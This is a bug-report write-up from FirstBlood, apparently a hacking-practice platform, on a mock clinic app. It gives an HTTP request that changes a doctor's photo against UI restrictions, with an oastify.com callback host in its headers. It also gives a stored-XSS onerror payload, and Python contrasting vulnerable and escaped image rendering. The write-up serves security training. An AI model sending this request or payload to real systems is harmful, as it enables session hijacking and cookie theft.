FirstBlood-#1453: Change Doctor's image
This issue was discovered on FirstBlood v3

On 2022-12-10, ayush1098 Level 8 reported:

Hello Team,

Summary:

We can upload the image from the /drpanel/drapi/edit-dr.php endpoint, and it will accept relative URLs to change the image.

Steps To Reproduce:

  1. Send this request:
POST /drpanel/drapi/edit-dr.php HTTP/1.1
Host: 84ceebdff6c3-ayush1098.a.firstbloodhackers.com
Cookie: drps=e7ba713ce83c4caf4b907254d
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108", "Google Chrome";v="108"
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 [email protected] os6cfn5
Accept: */*, text/os6cfn5
Origin: https://os6cfn5.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://waahcfda8s29igyjhf28xzg4ovuyszgo.oastify.com/ref
Accept-Encoding: gzip, deflate, os6cfn5
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 95

drid=1&name=Jon&bio=sxs&bookable=0&photoUrl=/doctor_1.png

Exploiting this to stored XSS:

We can exploit this for XSS via the file name. This XSS only works for drId=1 and executes on meet_drs.php.

The payload is /'"+onerror="alert(document.domain)

The magicbox will pop up on /meet_drs.php endpoint.

Impact:

We can change the image even though there are restrictions in the UI, and with the XSS we can do cookie stealing, session hijacking, etc.

Thanks & Regards

Ayush Singh

P2 High

Endpoint: /drpanel/drapi/edit-dr.php

Parameter: photoUrl

Payload: NA

FirstBlood ID: 64
Vulnerability Type: Stored XSS

There is a stored XSS vulnerability on meet_drs.php from the photo of the doctor

FirstBlood ID: 61
Vulnerability Type: Application/Business Logic

It mentions that doctor photos can NOT be modified but it is actually possible to modify them
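As an added illustration of both findings (not code from the report or from the FirstBlood application), the following Python models the server-side fix for edit-dr.php and the rendering fix for meet_drs.php. The form bodies are constructed from the report; note that the `+` in the reported payload is form-encoded space, so the stored value becomes `/'" onerror="alert(document.domain)`. The field allowlist, the photo-path pattern and the `render_img_*` helpers are assumptions for the example.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed request bodies: the one from the report, and the same body carrying the
# stored-XSS value. In application/x-www-form-urlencoded, '+' decodes to a space.
LEGIT_BODY = "drid=1&name=Jon&bio=sxs&bookable=0&photoUrl=/doctor_1.png"
XSS_BODY = "drid=1&name=Jon&bio=sxs&bookable=0&photoUrl=/'\"+onerror=\"alert(document.domain)"

# Fields the edit form is meant to change (assumed). photoUrl is deliberately absent:
# the UI states doctor photos cannot be modified, so the server must not honour it either.
EDITABLE_FIELDS = ("name", "bio", "bookable")

# Assumed allowlist for any future intentional photo update: one path segment, image extension.
PHOTO_RE = re.compile(r"^/[A-Za-z0-9_-]+\.(?:png|jpe?g|gif)$")


def parse_form(body: str) -> dict:
    """Decode a form body into single string values (first value per key)."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def apply_edit(record: dict, body: str) -> dict:
    """Business-logic fix: copy only allowlisted fields onto the stored doctor record."""
    form = parse_form(body)
    updated = dict(record)
    for field in EDITABLE_FIELDS:
        if field in form:
            updated[field] = form[field]
    return updated  # photoUrl in the request is ignored entirely


def is_valid_photo_url(value: str) -> bool:
    """Write-side check for a photo path, should photo changes ever be allowed."""
    return PHOTO_RE.fullmatch(value) is not None


def render_img_vulnerable(photo_url: str) -> str:
    """Raw concatenation into the src attribute: the pattern the report's payload exploits."""
    return '<img src="' + photo_url + '">'


def render_img_hardened(photo_url: str) -> str:
    """Output-encoding fix: escape quotes so the value cannot leave the attribute."""
    return '<img src="' + html.escape(photo_url, quote=True) + '">'
```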